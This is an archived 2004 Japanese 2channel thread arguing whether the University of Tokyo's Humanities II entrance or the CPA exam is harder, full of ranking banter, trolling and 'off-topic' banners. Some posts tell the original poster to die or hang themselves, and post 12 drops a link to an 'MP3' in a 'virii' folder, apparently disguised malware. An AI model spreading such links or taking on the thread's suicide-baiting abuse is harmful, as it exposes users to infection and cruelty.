5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

東大文Uと公認会計士どっちが難しい

1 :一般に公正妥当と認められた名無しさん:04/04/02 17:14 ID:???
やっぱり東大でしょうか・・・

2 :一般に公正妥当と認められた名無しさん:04/04/02 17:15 ID:???
>>1
氏ね
削除依頼出しとけよ、屑

3 :一般に公正妥当と認められた名無しさん:04/04/02 17:21 ID:???
>>1
板違い

格付け
http://that2.2ch.net/ranking/


4 :一般に公正妥当と認められた名無しさん:04/04/02 17:26 ID:???
東大に決まってんだろ。
終了

5 :一般に公正妥当と認められた名無しさん:04/04/02 17:37 ID:???
大学受験と資格試験は比較対象にはなりえない。こんな事もわかんないの、死んだ方がいいよ。削除依頼出しとけよ

6 :一般に公正妥当と認められた名無しさん:04/04/02 20:18 ID:???
会計士なんてマーチでも頑張りゃ受かる程度の難易度。


7 :一般に公正妥当と認められた名無しさん:04/04/02 21:17 ID:???
東大なんて高校生が頑張れば受かる程度の難易度。

8 :一般に公正妥当と認められた名無しさん:04/04/02 21:18 ID:???
 || ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄||
 ||
 || ○ このスレは板違いなので終了です。
 ||
 || ○ これ以降の書き込みは、削除されにくくなるので控えて下さい。
 ||
 || ○ 糞スレ放置にご協力お願いします。       Λ_Λ
 ||                            \ (゚ー゚*) キホン。
 ||                               ⊂⊂ |
 ||___ ∧ ∧__∧ ∧__ ∧ ∧_      | ̄ ̄ ̄ ̄|
      (  ∧ ∧__ (   ∧ ∧__(   ∧ ∧     ̄ ̄ ̄
    〜(_(  ∧ ∧_ (  ∧ ∧_ (  ∧ ∧  は〜い、先生。
      〜(_(   ,,)〜(_(   ,,)〜(_(   ,,)
        〜(___ノ  〜(___ノ   〜(___ノ


9 :一般に公正妥当と認められた名無しさん:04/04/02 21:57 ID:???
会計士に受かる自信はあるが東大に受かる自信はない。
数学とか理科できねーもん。


10 :一般に公正妥当と認められた名無しさん:04/04/02 22:00 ID:???
>>7
うまい!

11 :一般に公正妥当と認められた名無しさん:04/04/02 22:29 ID:???
そういえば不動産鑑定士って高校在学中に合格したやついたな。
会計士も受験資格なくなったら高校在学中合格とか出るかもね。
慶應の付属あたりで。

12 :一般に公正妥当と認められた名無しさん:04/04/02 22:41 ID:???
http://easyweb.easynet.co.uk/~hiros/virii00/METALLICA_SONG.MP3


13 :一般に公正妥当と認められた名無しさん:04/04/02 22:42 ID:???
相手にするな、スルーしろ。
相手にするから糞スレ立てるんだよ。

14 :一般に公正妥当と認められた名無しさん:04/04/02 22:42 ID:???
良スレあげ

東大受かった奴でも落ちる会計士試験

東大かすりもしなかった奴でも受かる会計士試験

こりゃ難しいや

15 :一般に公正妥当と認められた名無しさん:04/04/02 22:43 ID:???
>>14
糞スレあげるな死ね

16 :一般に公正妥当と認められた名無しさん:04/04/02 23:04 ID:???
>>15
死にません

17 :一般に公正妥当と認められた名無しさん:04/04/02 23:20 ID:???

ボクは死にましぇん!!

あなたが好きだから!!!


18 :一般に公正妥当と認められた名無しさん:04/04/02 23:29 ID:???
東大生が会計士試験に受かる確率と
会計士合格者が東大に受かる確率ってどっちが高いのかな?

19 :一般に公正妥当と認められた名無しさん:04/04/03 00:15 ID:???
>>18
前者だな

20 :一般に公正妥当と認められた名無しさん:04/04/03 00:25 ID:???
国公立医学部と公認会計士どっちが難しいですか?
http://school2.2ch.net/test/read.cgi/exam/1080869476/

とおなじ人物がこのスレを立てたと判明しますた。

21 :一般に公正妥当と認められた名無しさん:04/04/03 15:06 ID:???
 || ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄||
 ||
 || ○ このスレは板違いなので終了です。 既に削除依頼も出されています。
 ||
 || ○ これ以降の書き込みは、削除されにくくなるので控えて下さい。
 ||
 || ○ 糞スレ放置にご協力お願いします。     Λ_Λ 
 ||                            \ (゚ー゚*) キホン。
 ||                               ⊂⊂ |
 ||___ ∧ ∧__∧ ∧__ ∧ ∧_      | ̄ ̄ ̄ ̄|
      (  ∧ ∧__ (   ∧ ∧__(   ∧ ∧     ̄ ̄ ̄
    〜(_(  ∧ ∧_ (  ∧ ∧_ (  ∧ ∧  は〜い、先生。
      〜(_(   ,,)〜(_(   ,,)〜(_(   ,,)
        〜(___ノ  〜(___ノ   〜(___ノ


22 :mahkun:04/04/04 22:25 ID:Ir1hT2Z9
沖縄に行くと二日三日いれば沖縄の人かそうでないかは一見して分かるようになるよ

沖縄人(ウチナンチュ)でしょう??

って聴くと誰もが明るい顔をして

そーさーぁ

って答えるんだよね
こっちもなんか明るい気持ちになるよね

東京は何でも高度にインテリジェントで高度にテクニカルなものがいくらでもある
今お仕事を完全休業して勉強はじめたけど
コンピュータ業界でも七年間でプロジェクトマネージャまでなったらかなりスピード出世だと思うけど
上を見たらきりが無いしまーくんなんてたいしたこと無いし
学歴について考えても博士号持ってる人なんて東京に何万人もいるし
公認会計士だって何万人もいるし
早稲田大学を出たようなひとでも東大の人から見ればぜんぜんランクが違うし
東大を出て銀行のニューヨーク支店長になったなんていっても
ニューヨークへ行けばそれよりステータスもあってお金持ちなんて何百万人もいるわけだし
都会に行けば行くほど
人は簡単なことで喜んでくれないし
簡単なことで認めてくれないし
簡単なことでは無視して
最悪は差別される






23 :一般に公正妥当と認められた名無しさん:04/04/04 22:44 ID:???
>>22
あんまり難しく考えるな

24 :一般に公正妥当と認められた名無しさん:04/04/04 23:13 ID:???
>>22
新キャラオメ


25 :一般に公正妥当と認められた名無しさん:04/04/05 00:22 ID:???
>>22
は少なくとも職歴無しの受験生よりは、世の中わかってるな


26 :一般に公正妥当と認められた名無しさん:04/04/05 00:45 ID:???
 || ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄||
 ||
 || ○ このスレは板違いなので終了です。 既に削除依頼も出されています。
 ||
 || ○ これ以降の書き込みは、削除されにくくなるので控えて下さい。
 ||
 || ○ 糞スレ放置にご協力お願いします。     Λ_Λ 
 ||                            \ (゚ー゚*) キホン。
 ||                               ⊂⊂ |
 ||___ ∧ ∧__∧ ∧__ ∧ ∧_      | ̄ ̄ ̄ ̄|
      (  ∧ ∧__ (   ∧ ∧__(   ∧ ∧     ̄ ̄ ̄
    〜(_(  ∧ ∧_ (  ∧ ∧_ (  ∧ ∧  は〜い、先生。
      〜(_(   ,,)〜(_(   ,,)〜(_(   ,,)
        〜(___ノ  〜(___ノ   〜(___ノ



27 :一般に公正妥当と認められた名無しさん:04/04/05 15:08 ID:???
東大の落ちこぼれと全力で戦ってあっさり抜かれるマーチのC がかわいそうでならない。慶応・早稲田を見習え。後、クソスレたてるな。

28 :一般に公正妥当と認められた名無しさん:04/04/06 12:54 ID:???


















29 :一般に公正妥当と認められた名無しさん:04/04/07 18:30 ID:???
>>1
拝啓
こんばんわ1さん。「こんにちわ」かな?初めてお便りします。
アナタはなぜこんなクソスレを作るに至ったのでしょうか。
家庭環境?社会への不満?いいえ、正解はあなたの心が病んでいるからです。
このままでは社会全体にとってアナタの存在は害毒であり、生きて
いる価値はまったくありません。可及的速やかに精神病院に入るなり
回線切って首を吊るなりしてください。 かしこ



30 :一般に公正妥当と認められた名無しさん:04/04/07 18:41 ID:???
東大に受かった時点で
監査法人に入れて収入ももらえるなら
同程度の難易度になる
逆もまた然り
それだけのこと

31 :一般に公正妥当と認められた名無しさん:04/04/07 18:58 ID:???
東大でて一般の企業に入ればそれだけで高収入だろ。
安月給で単純労働の監査法人にいく奴はイネーよ。
会計士とかは一般企業では出世の可能性がない奴がなるもの。


32 :一般に公正妥当と認められた名無しさん:04/04/07 19:25 ID:???
目指す理由が消極的だもの・・・

東大生だけど会計士目指すって変ですか?

http://money2.2ch.net/test/read.cgi/tax/1073788692/
1 名無しさん@そうだ確定申告に行こう 04/01/11 11:38 ID:NRBbe4Ui
給料だけを見たら商社や金融に行った方がいいといわれます。
東大なら官僚になればいいじゃんと言われます。
でも官僚や商社や金融なんて仕事も競争も半端じゃないとききます。
東大だからって就職はできても仕事はできるとは限らない。出世できるとは限らない。
与えられたことをそつなくこなすっていう意味ではある程度できると思いますが
営業とか企画とかプレゼンで他人をだしぬくとかそういうのはまったくもって自信ありません。
自分で仕事を作り出したりすることはできないことはなんとなく分かっています。
典型的なマニュアル人間なのを自覚しています。
いろいろ職業や資格の本を読んでいたら公認会計士という職業を見つけました。
主な仕事は監査ということですが監査って企業が作った財務諸表に間違いがないかとかをチェックする仕事ですよね?
こういう仕事なら私にでもできそうな気がします。
与えられた書類の誤りを探すという作業的なものならけっこう上手くできるのではないかと思います
幸いなことにペーパーテストの類は得意です。数学も苦手ではないですし、暗記は比較的得意です。
かなり消極的な理由ですが公認会計士を目指してみようと思います。
これって変でしょうか?


33 :miho:04/04/07 20:05 ID:OEPnkRph
みんな本当にアホね。東大とか一橋とか慶応とかって・・
2次試験受かってからいいなよ。学歴学歴って、バカ?
私からしたら東大も慶応も関係ない。
みんなちゃんと勉強しなくちゃ私みたいな立派な人になれないよ!

私はサッカーで有名な静岡県I市から、
'92年度に名門、横浜国大経済学部に入学。
国大野球部マネージャーをしながらもちゃんと2次試験に受かったよ。
その縁もあって、国大工学部にて教鞭をふるう旦那と20代で結婚。
今は某4大監査法人で季節労働してます。
そんな私だから学歴なんか関係ないけどね。
そうそう、旦那はとっても頭がいいの。
私より頭がいい人じゃないとお付き合いもできないしね。

まぁ、ここで騒いでるのは大体私大卒の人たちだけどねww
東大や一橋等、国立の人達はマナーがいい。
少しは私たちを見習ったら?

34 :一般に公正妥当と認められた名無しさん:04/04/07 20:06 ID:???
 || ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄||
 ||
 || ○ このスレは板違いなので終了です。 既に削除依頼も出されています。
 ||
 || ○ これ以降の書き込みは、削除されにくくなるので控えて下さい。
 ||
 || ○ 糞スレ放置にご協力お願いします。     Λ_Λ 
 ||                            \ (゚ー゚*) キホン。
 ||                               ⊂⊂ |
 ||___ ∧ ∧__∧ ∧__ ∧ ∧_      | ̄ ̄ ̄ ̄|
      (  ∧ ∧__ (   ∧ ∧__(   ∧ ∧     ̄ ̄ ̄
    〜(_(  ∧ ∧_ (  ∧ ∧_ (  ∧ ∧  は〜い、先生。
      〜(_(   ,,)〜(_(   ,,)〜(_(   ,,)
        〜(___ノ  〜(___ノ   〜(___ノ


35 :一般に公正妥当と認められた名無しさん:04/04/07 20:16 ID:???
>>33
ものすごい個人特定できそうな情報だな

36 :よしくん:04/04/07 20:21 ID:OEPnkRph
うちの大学(東大・経)でも今真面目に会計士目指そうってのは
女の子ばっかり、男は官僚か外資金融か留学→研究者に3極化してる。
特に前2つが多い。官僚狙ってる奴も10年くらい官僚やって留学でもして
箔つけてその後スピンアウトとか狙ってるのが多い。
これだけ勝ち組・負け組がはっきりしてくると地道に資格とって
安定した暮らしなんていうなんちゃって勝ち組じゃだめだってことだね。
昔は資格と学歴で上の下くらいの生活が保証されたが、
今じゃ中の中〜上くらいが精一杯、中と上の差は大きい。
要は勝ち組・負け組の2極化が進んで上の基準が
上がったってことなんだろな。
真の勝ち組になるにはどっかでガチの勝負しなきゃいけなくて、
それまでに出来るだけ有利な環境を整えておこうって発想に変りつつある。




37 :一般に公正妥当と認められた名無しさん:04/04/07 20:24 ID:???
http://musuka.rdap.jp/melody.html


38 :一般に公正妥当と認められた名無しさん:04/04/08 00:05 ID:???



















39 :一般に公正妥当と認められた名無しさん:04/04/09 17:15 ID:???
つうか僕が就職できないのは皆会社や社会が悪いんです、僕は賢いはずなんです、ばずなんです…
無職な日々は鬱憤ばかりたまります…親戚中から白い目で見られ…ドラクエももう飽きました…
金なし職なしスキルなし、もひとつおまけに彼女なし、たはっ救えないや、、俺…
抗欝剤 のんで ねます


40 :一般に公正妥当と認められた名無しさん:04/04/09 21:09 ID:???
>>39
おまえが逃げるときは、いつもねますだなw

41 :39:04/04/10 13:06 ID:???
逃げ癖がついたんだYO!
いやなことからはすぐにげる。
俺のピークは東大に入学したときだったんだ。
あとは下り坂。俺・・・
抗欝剤 のんで ねます


42 :よしくん:04/04/10 19:29 ID:4+6gGhRD
ネタ…?意味分からん
お前の質問に答えるが、まだ確定事項ではないことを最初に頭にとどめてくれ。
>>158ってのは要するに「前年度合格の士補に租税法もっていかれちゃう」ってことだよね?
だから半強制的に科目合格になる、と。
確かにそうなる可能性は現時点で否定はできない。
しかし、現在妥当とされている案では、旧制度合格者で新制度の租税法を残した者に
ついては、新制度から参入する者とは別に扱う可能性が高い。
なぜかというと、新制度1発目で>>158のような事態が起こると翌年も翌々年もずっと
同じことの繰り返しになってしまう恐れがあるからだ。06年に合格する実力があったのに
士補のおかげで租税法落ちになったやつが07年に合格。07年に合格する実力があったのに06年に租税法を
落としたやつが07年に租税法を持ってって…無限ループなのだよ。

この説明、お前の頭で理解できる?
無理なら結論だけ言う
「確定してないが>>158のようになる可能性は低く士補組を別枠措置とし、今までと実質てきには
あまり変わらない可能性が高い」
ってことでいいか?


43 :一般に公正妥当と認められた名無しさん:04/04/10 19:38 ID:8G1fGrum
東大から会計士なんて笑わせるなよ

44 :一般に公正妥当と認められた名無しさん:04/04/10 23:27 ID:???
↑TACや大原の授業や答練の時、前に立って言って味噌。

45 :一般に公正妥当と認められた名無しさん:04/04/10 23:48 ID:???
 || ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄||
 ||
 || ○ このスレは板違いなので終了です。 既に削除依頼も出されています。
 ||
 || ○ これ以降の書き込みは、削除されにくくなるので控えて下さい。
 ||
 || ○ 糞スレ放置にご協力お願いします。     Λ_Λ 
 ||                            \ (゚ー゚*) キホン。
 ||                               ⊂⊂ |
 ||___ ∧ ∧__∧ ∧__ ∧ ∧_      | ̄ ̄ ̄ ̄|
      (  ∧ ∧__ (   ∧ ∧__(   ∧ ∧     ̄ ̄ ̄
    〜(_(  ∧ ∧_ (  ∧ ∧_ (  ∧ ∧  は〜い、先生。
      〜(_(   ,,)〜(_(   ,,)〜(_(   ,,)
        〜(___ノ  〜(___ノ   〜(___ノ



46 :000:04/04/11 12:56 ID:exDonrne
給料だけを見たら商社や金融に行った方がいいといわれます。
東大なら官僚になればいいじゃんと言われます。
でも官僚や商社や金融なんて仕事も競争も半端じゃないとききます。
東大だからって就職はできても仕事はできるとは限らない。出世できるとは限らない。
与えられたことをそつなくこなすっていう意味ではある程度できると思いますが
営業とか企画とかプレゼンで他人をだしぬくとかそういうのはまったくもって自信ありません。
自分で仕事を作り出したりすることはできないことはなんとなく分かっています。
典型的なマニュアル人間なのを自覚しています。
いろいろ職業や資格の本を読んでいたら公認会計士という職業を見つけました。
主な仕事は監査ということですが監査って企業が作った財務諸表に間違いがないかとかをチェックする仕事ですよね?
こういう仕事なら私にでもできそうな気がします。
与えられた書類の誤りを探すという作業的なものならけっこう上手くできるのではないかと思います
幸いなことにペーパーテストの類は得意です。数学も苦手ではないですし、暗記は比較的得意です。
かなり消極的な理由ですが公認会計士を目指してみようと思います。
これって変でしょうか?


47 :一般に公正妥当と認められた名無しさん:04/04/11 13:06 ID:???
東大なんて簡単だよ会計士試験やれば分かる.

48 :一般に公正妥当と認められた名無しさん:04/04/11 15:18 ID:???
18歳かそこらで受からなければならないことや、定員等を考えても、やはり東大が
難しいと思うよ。司法試験にしても同様。
学習する内容については、会計士や司法試験のような資格試験の方が難しいのは
当たり前。

49 :一般に公正妥当と認められた名無しさん:04/04/11 15:30 ID:5lfR2+Xr
ていうか、文IIと比較するなよ。
文Iと文IIじゃ、宮廷、地底の差だよ。

文IIのやつに、東大を名乗るのはやめてほしい。
文III? そんなのあったっけ?

50 :一般に公正妥当と認められた名無しさん:04/04/11 15:40 ID:ZKJHpYuX
>>49
東大生以外じゃそんなことよくわからないのに必死だね

51 :一般に公正妥当と認められた名無しさん:04/04/11 17:54 ID:???
>文Iと文IIじゃ、宮廷、地底の差だよ。
学内ヒエラルキーはそうだが、学生の能力に
そこまで開きがあるわけではない。
因みに東大学内では
文T>>>文V>文U

52 :一般に公正妥当と認められた名無しさん:04/04/11 18:02 ID:TXA2B5Je
えええ

53 :一般に公正妥当と認められた名無しさん:04/04/11 18:13 ID:vcIgv9n5
東大入るだけで尊敬するよ。でも東大→会計士って灘高→総計って感じで当たり前というか、
東大生だから受かって当然というイメージがある。

54 :一般に公正妥当と認められた名無しさん:04/04/11 18:19 ID:???
>>51
それは2,3年前まで。今は文一>>>文ニ>>文三

55 :一般に公正妥当と認められた名無しさん:04/04/11 18:25 ID:???
>>53
知り合いが経済学部卒だが、1.5年ぐらいで始めた香具師20人のうち、8人ドロップアウト、8人一発担当合格
4人論文一発合格らしいよ。 因みに会計士やる奴はかなり成績上位らしい。これは意外というべきか。


56 :一般に公正妥当と認められた名無しさん:04/04/11 18:29 ID:???
>>55
ふーん、そんなもんなんだ。

57 :一般に公正妥当と認められた名無しさん:04/04/11 19:03 ID:???
>>55
みんながみんな1ッぱつでとおるわけじゃないんだYO!(プンプン

58 :一般に公正妥当と認められた名無しさん:04/04/11 21:36 ID:5lfR2+Xr
>55

だから、経済学部だろう。文II上がりだろう。所詮、東大の中の落ちこぼれだ。
法学部、文Iあがりだけを東大と呼んでくれ。

59 :一般に公正妥当と認められた名無しさん:04/04/11 21:48 ID:???
 || ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄||
 ||
 || ○ このスレは板違いなので終了です。 既に削除依頼も出されています。
 ||
 || ○ これ以降の書き込みは、削除されにくくなるので控えて下さい。
 ||
 || ○ 糞スレ放置にご協力お願いします。     Λ_Λ 
 ||                            \ (゚ー゚*) キホン。
 ||                               ⊂⊂ |
 ||___ ∧ ∧__∧ ∧__ ∧ ∧_      | ̄ ̄ ̄ ̄|
      (  ∧ ∧__ (   ∧ ∧__(   ∧ ∧     ̄ ̄ ̄
    〜(_(  ∧ ∧_ (  ∧ ∧_ (  ∧ ∧  は〜い、先生。
      〜(_(   ,,)〜(_(   ,,)〜(_(   ,,)
        〜(___ノ  〜(___ノ   〜(___ノ


60 :一般に公正妥当と認められた名無しさん:04/04/11 21:54 ID:???
文Uってそもそも大学受験で逃げた奴だしな・・・
今会計士受かってる奴が大学受験したころは文Vの方がまだ難しかったころだし。

61 :一般に公正妥当と認められた名無しさん:04/04/11 22:12 ID:RAK3MZWs
どの学部が文Tとか理Uとかわからない。
誰かおせーて

62 :一般に公正妥当と認められた名無しさん:04/04/11 22:17 ID:???
              糞スレageんなって……       :",
            . \  _____     ,;:",;:,'
         ∠''ー,  ノ/          ‘;:,'.;::,'.
          _ヽ:::} /   \   从  / / , - - 、 丶
         ( .l:::|\\\       ;:∵ ノ    )>  
          | .i::::| \\\ \ \从// ̄  ⌒)l ! ._         _  
          l |::::|   \\\ \/ /    イ | !.| / / | ̄| 「」「」 \ヽ/ヽ
    @ノノハ |=,{:::::i    \\\ \_-三=/| |   / /  \.\   ; /  /
    ノ( ´_ゝ/ /|::::::!     \\\ ..|    | | | //   .\\  ヽ/ヽヽ/ヽ 
   /'゛ー`''ヽー、/ { ̄{      | l | l l    ) し//==----  \`ー、 /   /   「」「」/>
  ///∠: <::l」:}.|  .}     .| l |  |  ||  | | .ー'         ー" ヽ/ \\   ノノ
  //|`''!´ \'~ソ/|   |     | l | l.|  |.|  |.| l l|                 ヽノ
 { { l |   ヾフヽハ\,j     | l | ( 丶(  \
 | |  l .|   ノ;/ノノ:!,,イ      | l |  \ \\ \
 l l  {_)  ノ/イ~´./      | l | l  i\ \\ \  >>61
 l |     `´ |  /     ///     i )  \. )  \
 | !       ,! /    /// /     |(_/ .(_/
 ヽヽ      i'":フ     //         l l ll l i|
  \ヽ    |::::/   /  /          |  | |  |l  
    \\  l:::/  //             | |  |
      `ヽ、 |::/   /
        |:::{  //
        !::::!
        `ー`''


63 :一般に公正妥当と認められた名無しさん:04/04/11 22:47 ID:IQXjmyPP
東大でも在学中合格しんどいよ。
大体東大は何年も用意してうけるから一発合格が当然なんだけど
せっかく大学はいって自分の時間削って試験勉強ということ自体に
不安と孤独感がありすぎる。
ロースクールみたいな道は会計士にないし。
結局しんどい道であるのは確か。しかも国1との併願がむずかしい
わけで、会計士おちれば民間おち。企業で経理やるのと会計士やるのとでは
根本的に人生が違う。ロースクールない時代には在学合格が現実的な
会計士という選択もありだが東大の場合司法試験も在学合格かなりいる。

文2であろうとロースクールという選択が今は現実的。
それは東大だけでなく他の大学の経済系学部もおなじ。
幸いというべきか理工系はロースクール受験惨敗だったらしい。


64 :一般に公正妥当と認められた名無しさん:04/04/11 23:01 ID:???
 || ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄||
 ||
 || ○ このスレは板違いなので終了です。 既に削除依頼も出されています。
 ||
 || ○ これ以降の書き込みは、削除されにくくなるので控えて下さい。
 ||
 || ○ 糞スレ放置にご協力お願いします。     Λ_Λ 
 ||                            \ (゚ー゚*) キホン。
 ||                               ⊂⊂ |
 ||___ ∧ ∧__∧ ∧__ ∧ ∧_      | ̄ ̄ ̄ ̄|
      (  ∧ ∧__ (   ∧ ∧__(   ∧ ∧     ̄ ̄ ̄
    〜(_(  ∧ ∧_ (  ∧ ∧_ (  ∧ ∧  は〜い、先生。
      〜(_(   ,,)〜(_(   ,,)〜(_(   ,,)
        〜(___ノ  〜(___ノ   〜(___ノ



65 :一般に公正妥当と認められた名無しさん:04/04/11 23:11 ID:???
>文2であろうとロースクールという選択が今は現実的。

な?この時点でもう逃げてるだろw

法学部ので優秀な奴はローで逃げずみんな現行狙ってるよ。


66 :一般に公正妥当と認められた名無しさん:04/04/11 23:15 ID:???
それでも大学受験で惨敗した早慶よりは数段優秀だろうが。
文U超行きたかった・・・


67 :一般に公正妥当と認められた名無しさん:04/04/11 23:22 ID:???
逃げだといわれようがなんといわれようが現実はこう。


文T避けて文U>>>>>>>>>>>>文T落ちて早慶

現行避けてローで弁護士>>>>>>>>現行狙って不合格

文U→経済→会計士>>>>>>>>>>>>>文T→法→司法試験落ち


法学部だって司法試験受からない奴は腐るほどいる。
文T受けて慶応なんかに行く羽目になった奴も現に知ってる
自分の力を見極められない奴はどこかで失敗するんだよ


68 :一般に公正妥当と認められた名無しさん:04/04/12 00:05 ID:???
>>67
オマエモナー

69 :一般に公正妥当と認められた名無しさん:04/04/12 00:13 ID:???
 || ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄||
 ||
 || ○ このスレは板違いなので終了です。 既に削除依頼も出されています。
 ||
 || ○ これ以降の書き込みは、削除されにくくなるので控えて下さい。
 ||
 || ○ 糞スレ放置にご協力お願いします。     Λ_Λ 
 ||                            \ (゚ー゚*) キホン。
 ||                               ⊂⊂ |
 ||___ ∧ ∧__∧ ∧__ ∧ ∧_      | ̄ ̄ ̄ ̄|
      (  ∧ ∧__ (   ∧ ∧__(   ∧ ∧     ̄ ̄ ̄
    〜(_(  ∧ ∧_ (  ∧ ∧_ (  ∧ ∧  は〜い、先生。
      〜(_(   ,,)〜(_(   ,,)〜(_(   ,,)
        〜(___ノ  〜(___ノ   〜(___ノ


70 :一般に公正妥当と認められた名無しさん:04/04/12 00:13 ID:???
文U→経済→大企業 >>>>>>>>文U→経済→会計士 >>>>>文U→経済→会計士うかっても2、3回目>>>>>>>>>>>>>>>>>>>>> うからないおまいさんこと>>67

71 :一般に公正妥当と認められた名無しさん:04/04/12 00:34 ID:???
マーチ→会計士の約200人>>>>>>>>東大→司法試験不合格
日東駒専→会計士の25人>>>>>>>>東大→会計士不合格
立正大学→会計士の4人>>>>>>>>>67



72 :一般に公正妥当と認められた名無しさん:04/04/12 00:49 ID:uTOWb15O
大企業って ぷ ドキュン大の会話みたいだな。

73 :一般に公正妥当と認められた名無しさん:04/04/12 00:52 ID:???
 || ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄||
 ||
 || ○ このスレは板違いなので終了です。 既に削除依頼も出されています。
 ||                        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 || ○ これ以降の書き込みは、削除されにくくなるので控えて下さい。
 ||
 || ○ 糞スレ放置にご協力お願いします。     Λ_Λ 
 ||                            \ (゚ー゚*) キホン。
 ||                               ⊂⊂ |
 ||___ ∧ ∧__∧ ∧__ ∧ ∧_      | ̄ ̄ ̄ ̄|
      (  ∧ ∧__ (   ∧ ∧__(   ∧ ∧     ̄ ̄ ̄
    〜(_(  ∧ ∧_ (  ∧ ∧_ (  ∧ ∧  は〜い、先生。
      〜(_(   ,,)〜(_(   ,,)〜(_(   ,,)
        〜(___ノ  〜(___ノ   〜(___ノ



74 :一般に公正妥当と認められた名無しさん:04/04/12 01:00 ID:OAHrTg7r
だから、文IIは、東大じゃないって。


75 :一般に公正妥当と認められた名無しさん:04/04/12 01:04 ID:???
>>67は文IIと判明しました。
ちなみに、このスレと医学部スレを立てたのも
>>67でした。

76 :一般に公正妥当と認められた名無しさん:04/04/12 21:36 ID:OAHrTg7r
文IIクラスじゃ、公認会計士が丁度いいんじゃない?
国I受けるなんて、10年早い。

結論

文II == 公認会計士レベル

77 :一般に公正妥当と認められた名無しさん:04/04/12 23:21 ID:???

文U→経済→NRI、早大教授の植草 のぞきで逮捕w

78 :一般に公正妥当と認められた名無しさん:04/04/12 23:26 ID:chqOLPyM
野村総合研究所主席オナニスト

79 :一般に公正妥当と認められた名無しさん:04/04/12 23:29 ID:???
つまらん

80 :一般に公正妥当と認められた名無しさん:04/04/12 23:41 ID:???
捕まってもこいつは勝ち組だろ。
もう43年間エリートコースまっしぐらだったんだから。

81 ::04/04/13 18:30 ID:???
あーあ、わしの大学の先輩がやってしまいました(><)☆


82 :会計士目指す関西人:04/04/14 23:55 ID:???
多分東大合格のほうがむずいんじゃないか?
俺の知り合いが数人東大受かったが周りの奴ら法学部でもないのに
司法試験合格するためにダブルスクールしてるらしいぞ・・・・
そいつら曰く「この御時世で司法試験くらい取ってなきゃ話なんねーだろ。」だと


信じられない話ですが実話です


83 :一般に公正妥当と認められた名無しさん:04/04/15 00:04 ID:UjZq9HHR
難易度では、
東大>会計士>文II>>>文III
くらいでしょう。
早稲田・慶応などの底辺大学でも、法学部以外で司法試験のためダブルスクール(動詞)しています。
文IIって、下手すりゃ、名古屋や九州レベルじゃん。



84 :一般に公正妥当と認められた名無しさん:04/04/15 00:07 ID:UjZq9HHR
そもそも東大では、
国I ≧ 文I > 落ちこぼれ > 司法試験 > 文II
です。
文IIなら、起死回生で、司法試験でも受けたくなるわな。
会計士でも5分5分なのにw

85 :一般に公正妥当と認められた名無しさん:04/04/15 00:43 ID:???
会計士取ったあとずっと監査法人勤務なら待遇からして負け組かもしれんが、独立とか転職して成功すれば文T→官僚、弁護士、超一流企業に対抗できるんじゃないか?

86 :一般に公正妥当と認められた名無しさん:04/04/15 00:46 ID:???
>>85
転職とか一点だけをみて勝ち負けはつかない。
流れが重要。

87 :一般に公正妥当と認められた名無しさん:04/04/15 00:47 ID:???
経済は一生経済だしな。

88 :一般に公正妥当と認められた名無しさん:04/04/15 23:06 ID:???
http://school2.2ch.net/test/read.cgi/exam/1082035713/8

8 名前: 一般に公正妥当と認められた名無しさん 投稿日: 04/04/15 22:52 ID:Y4ive4UR
だってぇ〜↓立てたの俺だも〜んw 全然削除されないやw

国公立医学部と公認会計士どっちが難しいですか?
http://school2.2ch.net/test/read.cgi/exam/1080869476/

東大文Uと公認会計士どっちが難しい
http://school2.2ch.net/test/read.cgi/exam/1080893682/



89 :一般に公正妥当と認められた名無しさん:04/04/15 23:17 ID:???
http://school2.2ch.net/test/read.cgi/exam/1082035713/13
13 名前: 一般に公正妥当と認められた名無しさん 投稿日: 04/04/15 23:07 ID:Y4ive4UR
プ
悔しかったら削除してみろ〜いw


90 :一般に公正妥当と認められた名無しさん:04/04/15 23:36 ID:Y4ive4UR
削除コピペ荒らしクンのしゃくにさわったかな?アハ

91 :一般に公正妥当と認められた名無しさん:04/04/17 00:16 ID:???
東大って短答落ちでもうかるんやろ!

92 :一般に公正妥当と認められた名無しさん:04/04/17 18:25 ID:???
マーチでも短答通る。
つまり
マーチ>>>>灯台

93 :一般に公正妥当と認められた名無しさん:04/04/18 01:48 ID:9j1aLMe9
>92
